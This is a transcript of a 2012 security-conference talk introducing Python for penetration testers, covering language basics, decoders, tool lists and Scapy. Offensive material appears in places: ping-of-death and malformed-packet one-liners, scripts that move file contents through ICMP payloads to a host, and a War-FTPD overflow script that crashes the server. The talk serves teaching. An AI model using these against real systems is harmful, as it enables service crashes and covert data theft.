
>>>import antigravity. Overview of Python Flying made simple without the Nyquil hangover Keith



Presentation on theme: ">>>import antigravity. Overview of Python Flying made simple without the Nyquil hangover Keith"— Presentation transcript:

1 >>>import antigravity

2

3 Overview of Python Flying made simple without the Nyquil hangover Keith

4 Agenda
- About me
- About Python
- Python basics
- Python's uses
- Coding for Penetration Testers book
- Tips, tricks, observations
- Resources

5 Who am I? (About me) Husband/father/geek/gets distracted by shiny objects easily. Career path: switched to IT in 1999, professionally in IT since 2001 – learning, studying, and currently interviewing for infosec professional roles. VBScript – 2007. Python – 2011.

6 About Python Conceived in the late 1980s by Guido van Rossum at CWI. Python 2.0 was released on October 16th, 2000. Python 3.0 was released in December 2008.

7 What is Python good for? Python comes with a large standard library that covers areas such as:
- string processing
- Internet protocols
- software engineering
- operating system interfaces
- artificial intelligence (because of similarities to Lisp)

8 What is Python good for? Extensive use in the information security industry:
- Exploit development
- Network
- Debugging
- Reverse engineering
- Fuzzing
- Web
- Forensics
- Malware analysis
- PDF

9 What is Python good for? Easy to write short scripts for system admin work. Python code is easy to understand. Once the basic syntax is learned, even the most complicated scripts can make sense.

10 What is Python good for? Python is cross platform!! It will work on Linux, Windows, Mac and most every other OS. Many, many resources and a big, friendly community

11 Python tools
- Social-Engineer Toolkit – specifically designed to perform advanced attacks against the human element.
- Artillery – a honeypot/monitoring/prevention tool used to protect Linux-based systems.
- Fast-Track – aimed at helping penetration testers in an effort to identify, exploit, and further penetrate a network.
- Scapy – send, sniff, dissect and forge network packets. Usable interactively or as a library.
- Pytbull – flexible IDS/IPS testing framework (shipped with more than 300 tests).
- Scrapy – a fast high-level screen scraping and web crawling framework, used to crawl websites and extract structured data from their pages.
- W3af – a Web Application Attack and Audit Framework.

12 Inspiration for the idea? (Part 1)

13 Post CSAW CTF Inspiration for the idea? (Part 2)

14

15 Python 101 – Indentation does matter

This will work:

```python
startNumber = int(raw_input("Enter the start number here "))
endNumber = int(raw_input("Enter the end number here "))

def fib(n):
    if n < 2:
        return n
    return fib(n-2) + fib(n-1)

print map(fib, range(startNumber, endNumber))
```

But this won't, because the body of fib is not indented (Python raises an IndentationError):

```python
startNumber = int(raw_input("Enter the start number here "))
endNumber = int(raw_input("Enter the end number here "))

def fib(n):
if n < 2:
return n
return fib(n-2) + fib(n-1)

print map(fib, range(startNumber, endNumber))
```

16 Python 101 – Modules and help

All scripts are considered modules. An entire module can be imported, or only certain names from it can be used inside a script.

Entire module:

```
>>> import sys
```

Partial (one name):

```
>>> from sys import argv
```

Help is built in.

Help on modules:

```
>>> import sys, hashlib
>>> help(sys)
>>> help(hashlib)
~$ pydoc sys
~$ pydoc hashlib
```

Help on methods:

```
>>> import sys, hashlib
>>> help(sys.argv)
>>> help(hashlib.sha512)
~$ pydoc sys.argv
~$ pydoc hashlib.sha512
```

17 Python 101 – Scripts

Windows

File extensions:
- *.py – Python script
- *.pyc – Compiled Python file (generated by running a script)

Running scripts: the .py file extension is associated with python.exe. The script should still have #!/usr/bin/python at the top in case you want to run it on Linux. If the path to the interpreter is in your system path, you can double-click the script to run it; otherwise:

```
C:\Users\Keith>python password.py
```

Linux

File extensions (optional):
- *.py – Python script
- *.pyc – Compiled Python file (generated by running a script)

Running scripts: must have #!/usr/bin/python (the path to python) at the top of the script. If you're running it from the terminal, the script must be chmod'ed to make it executable, or you can call python with the script name:

```
~ $ python password.py
```

It can be run interactively, via the command prompt (Windows) or via the shell (Linux):

```
~ $ python
Python 2.72
Type "help", "copyright"..
>>>
```

Other shells: IDLE, DreamPie, IPython

18 Python 102 – Conditional statements

If statement (comparison is ==, not the single = the slide shows):

```python
if x == True:
    print True
```

Else statement:

```python
if x == 1:
    print "1"
else:
    print "not 1"
```

Elif statement:

```python
if expression1:
    statement(s)
elif expression2:
    statement(s)
else:
    statement(s)
```

Data types

Numbers:

```python
A = 10        # integer
B = 0100      # long integers: octal (0100), hex (0x41) or binary (0b...; the binary digits are missing from the transcript)
B = 0x41
C = 3.56      # float
D = 3.16j     # complex
```

String:

```python
A = 'This is a string'
print A          # 'This is a string'
print A[0]       # 'T'
print A[3:6]     # 's i'
print A[4:]      # ' is a string'
print A * 2
print A + " and this is how it prints"
```

List (mutable):

```python
list = ['abc', 45, 'The Avengers', 0x67, 'def', 15.5]
print list
print list[0]
print list[1:3]
print list[2:]
list.append("Detroit")   # append is a method call, so (), not the [] on the slide
# list is now ['abc', 45, 'The Avengers', 0x67, 'def', 15.5, 'Detroit']
```

Tuple (not mutable):

```python
list = ('abc', 45, 'The Avengers', 0x67, 'def', 15.5)
print list
print list[0]
print list[1:3]
print list[2:]
list.append("Detroit")
# AttributeError: 'tuple' object has no attribute 'append'
```

19 Python 102 – Functions

Creating a function:

```python
def base64_decode(base64_key):
    answer = base64_key.decode('base64', 'strict')
    print answer
```

In use (the function lives in a module named csaw; the base64 string is one unbroken line):

```
>>> csaw.base64_decode('V2VsY29tZSB0byBCc2lkZXMgRGV0cm9pdCAyMDEyLiBNYWtlIHN1cmUgdG8gdGhhbmsgUnlhbiwgU3RldmVuLCBXb2xmZ2FuZywgYW5kIEt5bGUgZm9yIGFsbCB0aGUgaGFyZCB3b3JrIHRoZXkgZGlkIHRvIG1ha2UgdGhpcyB5ZWFyIHN1Y2ggYSBzdWNjZXNzIQ==')
Welcome to Bsides Detroit 2012. Make sure to thank Ryan, Steven, Wolfgang, and Kyle for all the hard work they did to make this year such a success!
>>>
```

Looping

While loop:

```python
count = 0
while (count < 9):
    print 'The count is:', count
    count = count + 1
print "Good bye!"
```

For loop (turns a colon-separated list of decimal code points from the command line back into characters):

```python
import sys

code1 = (sys.argv[1])
code_split = code1.split(':')
for i in code_split:
    code1a = int(i)
    codefinal = chr(code1a)
    sys.stdout.write(codefinal)
```

Loop control:

```python
count = 0
while (count < 9):
    print 'The count is:', count
    count = count + 1
    if count == 7:
        break
print "Good bye!"
```

20 Python 102 – Files

Open a file for reading:

```python
#!/usr/bin/python
f = open('base64.txt', 'r')
file = f.read()
answer = file.decode('base64', 'strict')
print answer
f.close()
```

Write to a file:

```python
#!/usr/bin/python
import sys
if len(sys.argv) < 2:
    sys.exit("Usage " + sys.argv[0] + " \n")
basecode = sys.argv[1]
answer = basecode.decode('base64', 'strict')
print answer
fo = open("base64.txt", "w")
fo.write(answer)
fo.close()
```

Input/output

raw_input:

```python
#!/usr/bin/python
str = raw_input("Enter your input: ")
print "Received input is : ", str
```

Input is: Thanks for coming to Bsides
Output is: Received input is :  Thanks for coming to Bsides

input:

```python
#!/usr/bin/python
# In Python 2, input() evaluates whatever is typed as a Python expression,
# which is why "5 * 5" comes back as 25. raw_input() returns the raw text and
# is the one to use for anything untrusted.
str = input("Enter your input: ")
print "Received input is : ", str
```

Input is: 5 * 5
Output is: Received input is :  25

21 Python’s uses – General scripting Cryptography Password creation Use files (write to/read from)

22 Cryptography

Encode ROT13 code (the transcript repeats the Base64 script here; the ROT13 version uses the rot13 codec, the counterpart of the rot13 decode on slide 23):

```python
#!/usr/bin/python
code = raw_input("Enter the data you wish to be encoded to ROT13")
answer = code.encode('rot13', 'strict')
print answer
```

Encode Base64 code:

```python
#!/usr/bin/python
code = raw_input("Enter the data you wish to be encoded to Base64")
answer = code.encode('base64', 'strict')
print answer
```

23 Decrypt module

```python
#!/usr/bin/python
import sys

def hexdecode(hex_key):
    # colon-separated hex bytes, e.g. 42:73:69
    import binascii
    hex_split = hex_key.split(':')
    for decode in hex_split:
        hex_decode = binascii.a2b_hex(decode)
        sys.stdout.write(hex_decode)

def uni_decode(unicode_key):
    # colon-separated decimal code points, e.g. 66:115:105
    unicode_split = unicode_key.split(':')
    for i in unicode_split:
        code1a = int(i)
        codefinal = chr(code1a)
        sys.stdout.write(codefinal)

def base64_decode(base64_key):
    answer = base64_key.decode('base64', 'strict')
    print answer

def binary_decode(binary_key):
    import math
    # split the bit string into 8-character chunks
    f = lambda v, l: [v[i*l:(i+1)*l] for i in range(int(math.ceil(len(v)/float(l))))]
    basecode = f(binary_key, 8)
    for code in basecode:
        decodea = int(code, 2)
        decodeb = chr(decodea)
        sys.stdout.write(decodeb)

def rot13_decode(rot13_key):
    answer = rot13_key.decode('rot13', 'strict')
    print answer
```
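The same five decoders rewritten for Python 3, as an added example (not the slide's code): Python 3 removed the 'base64' and 'rot13' str codecs the slide relies on, so each decoder is built on base64, binascii and codecs, the functions return strings instead of printing, and a dispatcher turns unknown names and malformed input into a ValueError.

```python
"""Python 3 version of the slide-23 decoder module (added example).

Inputs keep the slide's conventions: colon-separated hex bytes, colon-separated
decimal code points, a base64 blob, a string of 8-bit groups, or rot13 text.
"""
import base64
import binascii
import codecs
import sys


def hexdecode(hex_key):
    """'42:73:69' -> 'Bsi': each colon-separated field is one hex byte."""
    raw = b"".join(binascii.unhexlify(part.strip())
                   for part in hex_key.split(":") if part.strip())
    return raw.decode("latin-1")


def uni_decode(unicode_key):
    """'66:115:105' -> 'Bsi': each field is a decimal code point."""
    return "".join(chr(int(part)) for part in unicode_key.split(":") if part.strip())


def base64_decode(base64_key):
    """Whitespace is dropped first, so a blob wrapped across lines (as on slide 19) still decodes."""
    compact = "".join(base64_key.split())
    return base64.b64decode(compact, validate=True).decode("utf-8")


def binary_decode(binary_key):
    """'0100001001110011' -> 'Bs': 8-bit groups, left to right; whitespace between groups is allowed."""
    bits = "".join(binary_key.split())
    if len(bits) % 8:
        raise ValueError("binary input length %d is not a multiple of 8" % len(bits))
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits), 8))


def rot13_decode(rot13_key):
    """codecs.decode(..., 'rot_13') replaces Python 2's str.decode('rot13')."""
    return codecs.decode(rot13_key, "rot_13")


DECODERS = {
    "hex": hexdecode,
    "uni": uni_decode,
    "base64": base64_decode,
    "binary": binary_decode,
    "rot13": rot13_decode,
}


def decode(kind, data):
    """Dispatch by name; unknown names and malformed input both raise ValueError."""
    try:
        decoder = DECODERS[kind]
    except KeyError:
        raise ValueError("unknown encoding %r (expected one of %s)" % (kind, ", ".join(DECODERS)))
    try:
        return decoder(data)
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError("malformed %s input: %s" % (kind, exc))


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: %s <hex|uni|binary|base64|rot13> <data>" % sys.argv[0])
    print(decode(sys.argv[1], sys.argv[2]))
```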

24 Decrypt module

25

26 Password creation

```python
##Author: ATC
##Please score this on activestate
import string, random

print "How many characters would you like the password to have?"
print "Must be nine or more"
length = input()
password_len = length
password = []
# three characters from each class, then fill the rest from all three classes
for group in (string.ascii_letters, string.punctuation, string.digits):
    password += random.sample(group, 3)
password += random.sample(string.ascii_letters + string.punctuation + string.digits,
                          password_len - len(password))
random.shuffle(password)
password = ''.join(password)
print password
```
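An added Python 3 version of that generator (not the slide's code) with one change a security engineer would insist on: the slide draws from `random`, a Mersenne Twister PRNG whose output can be predicted after observing a few values, so the rewrite draws from the OS CSPRNG through `secrets` while keeping the slide's rule of at least three characters from each class; `has_all_classes` is an assumed helper name for checking that rule.

```python
"""Password generator from slide 26 redone with the secrets module (added example)."""
import secrets
import string

CLASSES = (string.ascii_letters, string.punctuation, string.digits)
ALPHABET = "".join(CLASSES)
PER_CLASS = 3  # the slide's "must be nine or more": 3 classes x 3 characters


def generate_password(length, per_class=PER_CLASS):
    """Return `length` characters with at least `per_class` from every class."""
    minimum = per_class * len(CLASSES)
    if length < minimum:
        raise ValueError("length must be at least %d" % minimum)
    rng = secrets.SystemRandom()  # random.Random API, but backed by os.urandom
    chars = []
    for group in CLASSES:
        chars += rng.sample(group, per_class)     # distinct picks, as random.sample on the slide
    chars += [secrets.choice(ALPHABET) for _ in range(length - len(chars))]
    rng.shuffle(chars)  # otherwise the class-guaranteed characters sit at fixed positions
    return "".join(chars)


def has_all_classes(password, per_class=PER_CLASS):
    """Assumed helper: True when every class contributes at least per_class characters."""
    return all(sum(c in group for c in password) >= per_class for group in CLASSES)


if __name__ == "__main__":
    wanted = int(input("How many characters would you like the password to have? (nine or more) "))
    print(generate_password(wanted))
```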

27 Use files (write to/read from)

Read from a file:

```python
#!/usr/bin/python
f = open('base64.txt', 'r')
file = f.read()
answer = file.decode('base64', 'strict')
f.close()
```

Write to a file:

```python
#!/usr/bin/python
code = raw_input("Enter the data you wish to be encoded to Base64")
answer = code.encode('base64', 'strict')
f = open('base64.txt', 'w')
line = f.write(answer)
f.close()
```

28 Python's uses – Networking
- Scapy: send, sniff, dissect and forge network packets. Usable interactively or as a library.
- Pytbull: flexible IDS/IPS testing framework (shipped with more than 300 tests).
- Mallory: man-in-the-middle proxy for testing.
- mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly.
- Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB.
- Knock Subdomain Scan: enumerate subdomains on a target domain through a wordlist.
- pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap.
- libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission.
- dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols.
- pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection.
- Dirtbags py-pcap: read pcap files without libpcap.
- flowgrep: grep through packet payloads using regular expressions.
- httplib2: comprehensive HTTP client library that supports many features left out of other HTTP libraries.

29 Scapy
- Packet creation
- Read PCAP files
- Create graphical dumps (must have the appropriate supporting tools installed)
- Fuzzing
- Send and receive packets
- TCP traceroute (can do a graphical dump as well)
- Sniffing
- Send and receive files through alternate data channels (ICMP)
- Ping: ARP ping, ICMP ping, TCP ping, UDP ping
- Wireless frame injection
- OS fingerprinting
- Classic attacks: malformed packets, ping of death, Nestea attack, ARP cache poisoning
- Scans: SYN scan, ACK scan, XMAS scan, IP scan, TCP port scan, IKE scan
- Advanced traceroute: TCP SYN traceroute, UDP traceroute, DNS traceroute
- VLAN hopping
- Wireless sniffing
- Firewalking

30 Scapy Packet creation Stacking layers

31 Scapy – Read PCAP files and create graphical dumps (the file name and packet index are missing from the transcript):

```python
A = rdpcap(" / ")
A[ ].psdump(" ", layer_shift=1)
```

32 Scapy ConfickerB9hrs.pcap

33 Scapy – Send packets

```python
send(IP(dst=" ")/ICMP())
sendp(Ether()/IP(dst=" ", ttl=(1,4)), iface="eth0")
sendp(rdpcap("/tmp/pcapfile"))
```

34 Scapy

35 Scapy

```python
sendp("I'm travelling on Ethernet", iface="eth0", loop=1, inter=0.2)
```

36 Scapy – Send and receive packets

```python
p = sr1(IP(dst="www.slashdot.org")/ICMP()/"XXXXXXXXXXX")
p = sr1(IP(dst="www.slashdot.org")/ICMP()/"ABCDEFGHIJ")
p.show()
```

37 Scapy – Send and receive packets

```python
p = sr1(IP(dst="www.slashdot.org")/ICMP()/"ABCDEFGHIJ")
```

38 Scapy – Send and receive packets

```python
sr(IP(dst=" ")/TCP(dport=[21,22,23]))
sr(IP(dst=" ")/TCP(dport=[21,22,23]), inter=0.5, retry=-2, timeout=1)
```

39 Scapy – Fuzzing

```python
send(IP(dst=" ")/fuzz(ICMP()/NTP(version=4)), loop=1)
send(IP(dst=" ")/fuzz(TCP()/NTP(version=4)), loop=1)
```

40 Scapy – TCP traceroute

```python
res, unans = traceroute(["www.microsoft.com", "www.cisco.com", "www.yahoo.com"], dport=[80,443], maxttl=20, retry=-2)
```

41 Scapy

42 Scapy – Sniffing

```python
sniff(filter="icmp and host ", count=2)
a = _
a.nsummary()
a[1]
sniff(iface="eth0", prn=lambda x: x.show())
```

43 Scapy

44 Scapy – SYN scan (sr() returns an answered/unanswered pair, so the result has to be unpacked before ans.summary() can be called):

```python
sr1(IP(dst=" ")/TCP(dport=80, flags="S"))
sr(IP(dst=" ")/TCP(sport=666, dport=(440,443), flags="S"))
ans, unans = sr(IP(dst=" ")/TCP(sport=RandShort(), dport=[440,441,442,443], flags="S"))
ans.summary()
ans.summary(lambda (s,r): r.sprintf("%TCP.sport% \t %TCP.flags%"))
```

45 Scapy – Classic attacks

Malformed packets:

```python
send(IP(dst=" ", ihl=2, version=3)/ICMP())
```

Ping of death:

```python
send( fragment(IP(dst=" ")/ICMP()/("X" * 60000)) )
```

46 Scapy

```python
send(IP(dst=" ", ihl=2, version=3)/ICMP())
send( fragment(IP(dst=" ")/ICMP()/("X" * 60000)) )
```

47 Scapy

48 Scapy (sendICMP.py; the transcript cuts off in the middle of the loop)

```python
#!/usr/bin/python
import sys
from scapy.all import *
conf.verb = 0
f = open(sys.argv[1])
data = f.read()
f.close()
host = sys.argv[2]
print "Data size is %d " % len(data)
i = 0
while i
```

49 Scapy (receiveICMP.py)

```python
#!/usr/bin/python
import sys
from scapy.all import *
conf.verb = 0
f = open(sys.argv[1], "w")
host = sys.argv[2]
count = int(sys.argv[3])
filter = "icmp and host " + host
print "sniffing with filter (%s) for %d bytes" % (filter, int(count))
packets = sniff(count, filter=filter)
for p in packets:
    # each ICMP packet's Raw payload is one chunk of the transferred file
    f.write(p['Raw'].load)
f.close()
print "Data received"
```
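The defender's side of slides 48/49, as an added Python 3 example that is not from the slides or from Scapy: it reads a pcap with the standard library alone (the "read pcap files without libpcap" idea from slide 28) and tallies ICMP echo payload bytes per source/destination pair, counting packets whose payload is larger than a normal ping's, which is what a file pushed through echo payloads looks like on the wire. The capture is constructed inline with zeroed checksums; `payload_report` and the other function names are this example's own.

```python
"""Tally ICMP echo payloads in a classic pcap using only struct and socket (added example)."""
import socket
import struct

PCAP_MAGIC = 0xA1B2C3D4
ETHERTYPE_IPV4 = 0x0800
IPPROTO_ICMP = 1
ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY = 8, 0
NORMAL_PING_PAYLOAD = 56  # Linux ping default; echo payloads well above this deserve a look


def build_icmp_echo(src, dst, payload, icmp_type=ICMP_ECHO_REQUEST, seq=1):
    """Ethernet/IPv4/ICMP echo frame for the constructed capture (checksums left as 0)."""
    icmp = struct.pack("!BBHHH", icmp_type, 0, 0, 0x1234, seq) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 1, 0, 64,
                     IPPROTO_ICMP, 0, socket.inet_aton(src), socket.inet_aton(dst))
    eth = b"\x00\x11\x22\x33\x44\x55" + b"\x66\x77\x88\x99\xaa\xbb" + struct.pack("!H", ETHERTYPE_IPV4)
    return eth + ip + icmp


def build_pcap(frames):
    """Wrap raw Ethernet frames in a little-endian classic pcap file (link type 1)."""
    out = [struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)]
    for i, frame in enumerate(frames):
        out.append(struct.pack("<IIII", 1700000000 + i, 0, len(frame), len(frame)) + frame)
    return b"".join(out)


def iter_pcap(data):
    """Yield each captured frame, honouring the byte order announced by the magic number."""
    endian = "<" if struct.unpack("<I", data[:4])[0] == PCAP_MAGIC else ">"
    if struct.unpack(endian + "I", data[:4])[0] != PCAP_MAGIC:
        raise ValueError("not a classic pcap file")
    offset = 24  # global header
    while offset + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", data[offset:offset + 16])
        offset += 16
        yield data[offset:offset + incl_len]
        offset += incl_len


def icmp_echo_payloads(data):
    """Return (src, dst, icmp_type, payload) for every ICMP echo request/reply in the pcap."""
    found = []
    for frame in iter_pcap(data):
        if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
            continue
        ihl = (frame[14] & 0x0F) * 4          # IP header length in bytes
        if frame[14 + 9] != IPPROTO_ICMP:     # protocol field
            continue
        total_len = struct.unpack("!H", frame[16:18])[0]
        icmp = frame[14 + ihl:14 + total_len]
        if len(icmp) < 8 or icmp[0] not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY):
            continue
        src = socket.inet_ntoa(frame[26:30])
        dst = socket.inet_ntoa(frame[30:34])
        found.append((src, dst, icmp[0], icmp[8:]))  # 8-byte ICMP header, then the payload
    return found


def payload_report(data, normal=NORMAL_PING_PAYLOAD):
    """Per (src, dst): echo packet count, payload bytes carried, and packets above the normal ping size."""
    report = {}
    for src, dst, _, payload in icmp_echo_payloads(data):
        entry = report.setdefault((src, dst), {"packets": 0, "bytes": 0, "oversized": 0})
        entry["packets"] += 1
        entry["bytes"] += len(payload)
        entry["oversized"] += int(len(payload) > normal)
    return report


# Constructed sample: three ordinary pings, then a 3000-byte "file" pushed in 1000-byte echo payloads.
SAMPLE_PCAP = build_pcap(
    [build_icmp_echo("10.0.0.5", "10.0.0.9", bytes(range(56)), seq=i) for i in range(3)]
    + [build_icmp_echo("10.0.0.7", "10.0.0.9", b"A" * 1000, seq=i) for i in range(3)]
)

if __name__ == "__main__":
    for (src, dst), stats in sorted(payload_report(SAMPLE_PCAP).items()):
        flag = "  <-- oversized echo payloads" if stats["oversized"] else ""
        print("%s -> %s: %d packets, %d payload bytes%s"
              % (src, dst, stats["packets"], stats["bytes"], flag))
```

Point it at a real capture by replacing SAMPLE_PCAP with the contents of a file opened in binary mode; a sensible baseline for `normal` is whatever your own hosts' ping actually sends.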

50 Python's uses – Debugging and Reverse Engineering
- Immunity Debugger: scriptable GUI and command line debugger.
- mona.py: PyCommand for Immunity Debugger that replaces and improves on pvefindaddr.
- Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH.
- IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro.
- pefile: read and work with Portable Executable (aka PE) files.
- pydasm: Python interface to the libdasm x86 disassembling library.
- PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine.
- uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory.
- diStorm64: disassembler library for AMD64, licensed under the BSD license.
- python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python.
- vdb / vtrace: vtrace is a cross-platform process debugging API implemented in Python, and vdb is a debugger which uses it (mirror).
- Androguard: reverse engineering and analysis of Android applications.

51 Coding for Pentesters - Exploitation scripting

52 Coding for Pentesters – Exploitation scripting: Building Exploits with Python
1. Windows XP SP0
2. War-FTPD v
3. Immunity Debugger

53 Coding for Pentesters – Exploitation scripting Step 1 – Open WarftpD with Immunity

54 Coding for Pentesters – Exploitation scripting Step 2 – Run WarFTPD by pressing F9 and then set it to GoOnline.

55 Coding for Pentesters – Exploitation scripting Step 3 – Build this script and run it…. and enjoy the show

```python
#!/usr/bin/python
import sys
import socket

hostname = sys.argv[1]
username = "A"*1024
passwd = "anything"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.connect((hostname, 21))
except:
    print ("[-] Connection error!")
    sys.exit(1)
r = sock.recv(1024)
print "[+] " + r
sock.send("user %s\r\n" % username)
r = sock.recv(1024)
print "[+] " + r
sock.send("pass %s\r\n" % passwd)
r = sock.recv(1024)
print "[+] " + r
sock.close()
```

56 Coding for Pentesters – Exploitation scripting The connection attempt with the user name of AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

57 Coding for Pentesters – Exploitation scripting

58 Step 4 - WarFTPD crashes!

59 Python's uses – Malware analysis
- torwget.py: Multi-platform TOR-enabled URL
- clamav_to_yara.py: Convert ClamAV antivirus signatures to YARA rules
- peid_to_yara.py: Convert PEiD packer signatures to YARA rules
- av_multiscan.py: Script to implement your own antivirus multi-scanner
- pescanner.py: Detect malicious PE file attributes
- ssdeep_procs.py: Detect self-mutating code on live Windows systems using ssdeep
- avsubmit.py: Command-line interface to VirusTotal, ThreatExpert, Jotti, and NoVirusThanks
- dbmgr.py: Malware artifacts database manager
- artifactscanner.py: Application to scan live Windows systems for artifacts (files, Registry keys, mutexes) left by malware
- mapper.py: Create static PNG images of IP addresses plotted on a map using GeoIP
- googlegeoip.py: Create dynamic/interactive geographical maps of IP addresses using Google charts
- sc_distorm.py: Script to produce disassemblies (via DiStorm) of shellcode and optionally apply an XOR mask
- vmauto.py: Python class for automating malware execution in VirtualBox and VMware guests
- mybox.py: Sample automation script for VirtualBox based on vmauto.py

60 Python's uses – Malware analysis
- myvmware.py: Sample automation script for VMware based on vmauto.py
- analysis.py: Python class for building sandboxes with support for analyzing network traffic, packet captures, and memory
- scd.py: Immunity Debugger PyCommand for finding shellcode in arbitrary binary files
- findhooks.py: Immunity Debugger PyCommand for finding Inline-style user mode API hooks
- pymon.py: WinAppDbg plug-in for monitoring API calls, alerting on suspicious flags/parameters and producing an HTML report
- xortools.py: Python library for encoding/decoding XOR, including brute force methods and automated YARA signature generation
- trickimprec.py: Immunity Debugger PyCommand for assistance when rebuilding import tables with Import REconstructor
- kraken.py: Immunity Debugger PyCommand for cracking Kraken's Domain Generation Algorithm (DGA)
- sbstrings.py: Immunity Debugger PyCommand for decrypting Silent Banker strings
- install_svc.py: Python script for installing a service DLL and supplying optional arguments to the service
- dll2exe.py: Python script for converting a DLL into a standalone executable
- windbg_to_ida.py: Python script to convert WinDbg output into data that can be imported into IDA

61 Python’s uses – Malware analysis Practical Malware Analysis FakeNet -

62 Python's uses – Malware analysis
- Cuckoo Sandbox: a malware analysis system used to analyze Windows executables, DLL files, PDF documents, Office documents, PHP scripts, Python scripts, Internet URLs and almost anything else you can imagine.
- yara-python: identify and classify malware samples.
- pyew: command line hexadecimal editor and disassembler, mainly to analyze malware.
- Exefilter: filter file formats in s, web pages or files. Detects many common file formats and can remove active content.
- pyClamAV: add virus detection capabilities to your Python software.
- jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities.
- phoneyc: pure Python honeyclient implementation.

63 Python's uses – Fuzzing
- Sickfuzz: a fuzzer made out of several custom .spk files and a Python script to wrap them up, including some tshark support and other features.
- Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components.
- Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing.
- antiparser: fuzz testing and fault injection API.
- TAOF, including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer.
- Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer).
- FileP: file fuzzer. Generates mutated files from a list of source files and feeds them to an external program in batches.
- Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns.
- Fuzzbox: multi-codec media fuzzer.
- Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems.
- Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms.
- WSBang: perform automated security testing of SOAP based web services.
- Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner.
- fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano.
- Fusil: Python library used to write fuzzing programs.

64 Python’s uses – Fuzzing Sickfuzz

65 Python's uses – Web
- Scrapy: a fast high-level screen scraping and web crawling framework, used to crawl websites and extract structured data from their pages. It can be used for a wide range of purposes, from data mining to monitoring and automated testing.
- ProxMon: processes proxy logs and reports discovered issues.
- Twill: browse the Web from a command-line interface. Supports automated Web testing.
- Windmill: web testing tool designed to let you painlessly automate and debug your web application.
- FunkLoad: functional and load web tester.
- spynner: programmatic web browsing module for Python with Javascript/AJAX support.
- python-spidermonkey: bridge to the Mozilla SpiderMonkey JavaScript engine; allows for the evaluation and calling of Javascript scripts and functions.

66 Python’s uses – Web

67 Python's uses – Forensics
- Volatility: extract digital artifacts from volatile memory (RAM) samples.
- SandMan: read the hibernation file, regardless of Windows version.
- LibForensics: library for developing digital forensics applications.
- TrIDLib: identify file types from their binary signatures. Now includes Python binding.
- aft: Android forensic toolkit.

68 Python’s uses – Forensics Volatility

69 Python's uses – Miscellaneous
- InlineEgg: toolbox of classes for writing small assembly programs in Python.
- Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging.
- RevHosts: enumerate virtual hosts for a given IP address.
